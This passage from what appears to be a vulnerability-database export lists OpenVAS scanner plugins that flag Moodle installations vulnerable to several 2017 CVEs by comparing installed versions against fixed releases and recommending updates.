"AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}], "openvas": [{"lastseen": "2019-05-29T18:34:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2643", "CVE-2017-2645", "CVE-2017-2644", "CVE-2017-2641"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-04-03T00:00:00", "id": "OPENVAS:1361412562310872543", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872543", "type": "openvas", "title": "Fedora Update for moodle FEDORA-2017-0196511d58", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for moodle FEDORA-2017-0196511d58\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872543\");\n script_version(\"$Revision: 14225 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 15:32:03 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-03 06:44:22 +0200 (Mon, 03 Apr 2017)\");\n script_cve_id(\"CVE-2017-2641\", \"CVE-2017-2643\", \"CVE-2017-2644\", \"CVE-2017-2645\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for moodle FEDORA-2017-0196511d58\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'moodle'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"moodle on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-0196511d58\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OCNEFJWEFGLEXH5WBL3ZLDHPJZIZNV2P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"moodle\", rpm:\"moodle~3.1.5~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2643", "CVE-2017-2645", "CVE-2017-2644", "CVE-2017-2641"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-04-01T00:00:00", "id": "OPENVAS:1361412562310872538", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872538", "type": "openvas", "title": "Fedora Update for moodle FEDORA-2017-0fcaf52f1a", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for moodle FEDORA-2017-0fcaf52f1a\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872538\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-01 06:39:37 +0200 (Sat, 01 Apr 2017)\");\n script_cve_id(\"CVE-2017-2641\", \"CVE-2017-2643\", \"CVE-2017-2644\", \"CVE-2017-2645\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for moodle FEDORA-2017-0fcaf52f1a\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'moodle'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"moodle on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-0fcaf52f1a\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OT3KIHDUNM2GLI2CFSKIINN3YGXKZA27\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"moodle\", rpm:\"moodle~3.1.5~1.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2643"], "description": "Global search displays user names for unauthenticated users.", "modified": "2018-10-26T00:00:00", "published": "2018-05-09T00:00:00", "id": "OPENVAS:1361412562310112270", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112270", "type": "openvas", "title": "Moodle 3.2.x < 3.2.2 Information Disclosure Vulnerability (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_moodle_info_disc_vuln_mar17_01_win.nasl 12120 2018-10-26 11:13:20Z mmartin $\n#\n# Moodle 3.2.x < 3.2.2 Information Disclosure Vulnerability (Windows)\n#\n# Authors:\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, https://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif( description )\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112270\");\n script_version(\"$Revision: 12120 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 13:13:20 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-09 12:51:33 +0200 (Wed, 09 May 2018)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2017-2643\");\n script_bugtraq_id(96978);\n\n script_name(\"Moodle 3.2.x < 3.2.2 Information Disclosure Vulnerability (Windows)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_moodle_cms_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"moodle/detected\", \"Host/runs_windows\");\n\n script_tag(name:\"summary\", value:\"Global search displays user names for unauthenticated users.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Global search does not respect 'Force login for profiles' setting\n and displays user names to guests when it should not (User profiles were still not displayed).\");\n script_tag(name:\"affected\", value:\"Moodle versions 3.2 to 3.2.1.\");\n script_tag(name:\"solution\", value:\"Update to version 3.2.2 or later.\");\n\n script_xref(name:\"URL\", value:\"https://moodle.org/mod/forum/discuss.php?d=349420\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:moodle:moodle\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! infos = get_app_version_and_location( port: port, cpe:CPE, exit_no_version:TRUE ) ) exit( 0 );\nversion = infos['version'];\npath = infos['location'];\n\nif( version_in_range( version: version, test_version: \"3.2.0\", test_version2: \"3.2.1\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.2.2\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:32:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2643"], "description": "Global search displays user names for unauthenticated users.", "modified": "2018-10-26T00:00:00", "published": "2018-05-09T00:00:00", "id": "OPENVAS:1361412562310112269", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112269", "type": "openvas", "title": "Moodle 3.2.x < 3.2.2 Information Disclosure Vulnerability (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_moodle_info_disc_vuln_mar17_01_lin.nasl 12120 2018-10-26 11:13:20Z mmartin $\n#\n# Moodle 3.2.x < 3.2.2 Information Disclosure Vulnerability (Linux)\n#\n# Authors:\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, https://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif( description )\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112269\");\n script_version(\"$Revision: 12120 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 13:13:20 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-09 12:51:33 +0200 (Wed, 09 May 2018)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2017-2643\");\n script_bugtraq_id(96978);\n\n script_name(\"Moodle 3.2.x < 3.2.2 Information Disclosure Vulnerability (Linux)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_moodle_cms_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"moodle/detected\", \"Host/runs_unixoide\");\n\n script_tag(name:\"summary\", value:\"Global search displays user names for unauthenticated users.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Global search does not respect 'Force login for profiles' setting\n and displays user names to guests when it should not (User profiles were still not displayed).\");\n script_tag(name:\"affected\", value:\"Moodle versions 3.2 to 3.2.1.\");\n script_tag(name:\"solution\", value:\"Update to version 3.2.2 or later.\");\n\n script_xref(name:\"URL\", value:\"https://moodle.org/mod/forum/discuss.php?d=349420\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:moodle:moodle\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! infos = get_app_version_and_location( port: port, cpe:CPE, exit_no_version:TRUE ) ) exit( 0 );\nversion = infos['version'];\npath = infos['location'];\n\nif( version_in_range( version: version, test_version: \"3.2.0\", test_version2: \"3.2.1\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.2.2\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 0 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:32:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2641"], "description": "Moodle is prone to an authenticated remote code execution vulnerability.", "modified": "2018-10-26T00:00:00", "published": "2018-05-09T00:00:00", "id": "OPENVAS:1361412562310113183", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113183", "type": "openvas", "title": "Moodle 2.x / 3.x Remote Code Execution Vulnerability - Mar'17 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_moodle_rce_vuln_may18_01_lin.nasl 12120 2018-10-26 11:13:20Z mmartin $\n#\n# Moodle 2.x / 3.x Remote Code Execution Vulnerability - Mar'17 (Linux)\n#\n# Authors:\n# Jan Philipp Schulte <jan.schulte@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, https://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif( description )\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113183\");\n script_version(\"$Revision: 12120 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 13:13:20 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-09 13:16:19 +0200 (Wed, 09 May 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2017-2641\");\n script_bugtraq_id(96977);\n\n script_name(\"Moodle 2.x / 3.x Remote Code Execution Vulnerability - Mar'17 (Linux)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_moodle_cms_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"moodle/detected\", \"Host/runs_unixoide\");\n\n script_tag(name:\"summary\", value:\"Moodle is prone to an authenticated remote code execution vulnerability.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Remote Code Execution is made possible by a combination of\n\n - insufficiently restrictive administrator dashboard\n\n - PHP Object Injection Vulnerability\n\n - SQL Injection Vulnerability.\");\n script_tag(name:\"impact\", value:\"Successful exploitation could allow an authenticated attacker to\n take complete control over the target system.\");\n script_tag(name:\"affected\", value:\"Moodle versions through 2.7.18, 2.8.0 through 3.0.8, 3.1.0 through 3.1.4\n and 3.2.0 through 3.2.1.\");\n script_tag(name:\"solution\", value:\"Update to version 2.7.19, 3.0.9, 3.1.5 or 3.2.2 respectively.\");\n\n script_xref(name:\"URL\", value:\"https://moodle.org/mod/forum/discuss.php?d=349419\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:moodle:moodle\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! infos = get_app_version_and_location( port: port, cpe:CPE, exit_no_version:TRUE ) ) exit( 0 );\nversion = infos['version'];\npath = infos['location'];\n\nif( version_is_less( version: version, test_version: \"2.7.19\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"2.7.19\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"2.8.0\", test_version2: \"3.0.8\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.0.9\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"3.1.0\", test_version2: \"3.1.4\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.1.5\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"3.2.0\", test_version2: \"3.2.1\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.2.2\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2641"], "description": "Moodle is prone to an authenticated remote code execution vulnerability.", "modified": "2018-10-26T00:00:00", "published": "2018-05-09T00:00:00", "id": "OPENVAS:1361412562310113184", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113184", "type": "openvas", "title": "Moodle 2.x / 3.x Remote Code Execution Vulnerability - Mar'17 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_moodle_rce_vuln_may18_01_win.nasl 12120 2018-10-26 11:13:20Z mmartin $\n#\n# Moodle 2.x / 3.x Remote Code Execution Vulnerability - Mar'17 (Windows)\n#\n# Authors:\n# Jan Philipp Schulte <jan.schulte@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, https://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif( description )\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113184\");\n script_version(\"$Revision: 12120 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 13:13:20 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-09 13:16:19 +0200 (Wed, 09 May 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2017-2641\");\n script_bugtraq_id(96977);\n\n script_name(\"Moodle 2.x / 3.x Remote Code Execution Vulnerability - Mar'17 (Windows)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_moodle_cms_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"moodle/detected\", \"Host/runs_windows\");\n\n script_tag(name:\"summary\", value:\"Moodle is prone to an authenticated remote code execution vulnerability.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Remote Code Execution is made possible by a combination of\n\n - insufficiently restrictive administrator dashboard\n\n - PHP Object Injection Vulnerability\n\n - SQL Injection Vulnerability.\");\n script_tag(name:\"impact\", value:\"Successful exploitation could allow an authenticated attacker to\n take complete control over the target system.\");\n script_tag(name:\"affected\", value:\"Moodle versions through 2.7.18, 2.8.0 through 3.0.8, 3.1.0 through 3.1.4\n and 3.2.0 through 3.2.1.\");\n script_tag(name:\"solution\", value:\"Update to version 2.7.19, 3.0.9, 3.1.5 or 3.2.2 respectively.\");\n\n script_xref(name:\"URL\", value:\"https://moodle.org/mod/forum/discuss.php?d=349419\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:moodle:moodle\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! infos = get_app_version_and_location( port: port, cpe:CPE, exit_no_version:TRUE ) ) exit( 0 );\nversion = infos['version'];\npath = infos['location'];\n\nif( version_is_less( version: version, test_version: \"2.7.19\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"2.7.19\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"2.8.0\", test_version2: \"3.0.8\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.0.9\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"3.1.0\", test_version2: \"3.1.4\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.1.5\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"3.2.0\", test_version2: \"3.2.1\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.2.2\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2645", "CVE-2017-2644"], "description": "Moodle is prone to multiple XSS vulnerabilities.", "modified": "2018-10-26T00:00:00", "published": "2018-05-08T00:00:00", "id": "OPENVAS:1361412562310113180", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113180", "type": "openvas", "title": "Moodle 3.x Multiple XSS Vulnerabilities - Mar'17 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_moodle_mult_xss_vuln_win.nasl 12120 2018-10-26 11:13:20Z mmartin $\n#\n# Moodle 3.x Multiple XSS Vulnerabilities - Mar'17 (Windows)\n#\n# Authors:\n# Jan Philipp Schulte <jan.schulte@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, https://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif( description )\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113180\");\n script_version(\"$Revision: 12120 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 13:13:20 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-08 14:24:34 +0200 (Tue, 08 May 2018)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2017-2644\", \"CVE-2017-2645\");\n script_bugtraq_id(96979, 96982);\n\n script_name(\"Moodle 3.x Multiple XSS Vulnerabilities - Mar'17 (Windows)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_moodle_cms_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"moodle/detected\", \"Host/runs_windows\");\n\n script_tag(name:\"summary\", value:\"Moodle is prone to multiple XSS vulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on a target host.\");\n script_tag(name:\"insight\", value:\"Users have the ability to upload evidence of prior learning.\n In this, both in the text and in the attachment, an XSS script could be embedded.\");\n script_tag(name:\"affected\", value:\"Moodle versions 3.1.0 through 3.1.4 and 3.2.0 through 3.2.1.\");\n script_tag(name:\"solution\", value:\"Update to version 3.1.5 or 3.2.2 respectively.\");\n\n script_xref(name:\"URL\", value:\"https://moodle.org/mod/forum/discuss.php?d=349421\");\n script_xref(name:\"URL\", value:\"https://moodle.org/mod/forum/discuss.php?d=349422\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:moodle:moodle\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! infos = get_app_version_and_location( port: port, cpe:CPE, exit_no_version:TRUE ) ) exit( 0 );\nversion = infos['version'];\npath = infos['location'];\n\nif( version_in_range( version: version, test_version: \"3.1.0\", test_version2: \"3.1.4\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.1.5\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"3.2.0\", test_version2: \"3.2.1\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.2.2\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:32:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2645", "CVE-2017-2644"], "description": "Moodle is prone to multiple XSS vulnerabilities.", "modified": "2018-10-26T00:00:00", "published": "2018-05-08T00:00:00", "id": "OPENVAS:1361412562310113179", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113179", "type": "openvas", "title": "Moodle 3.x Multiple XSS Vulnerabilities - Mar'17 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_moodle_mult_xss_vuln_lin.nasl 12120 2018-10-26 11:13:20Z mmartin $\n#\n# Moodle 3.x Multiple XSS Vulnerabilities - Mar'17 (Linux)\n#\n# Authors:\n# Jan Philipp Schulte <jan.schulte@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, https://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif( description )\n{\n 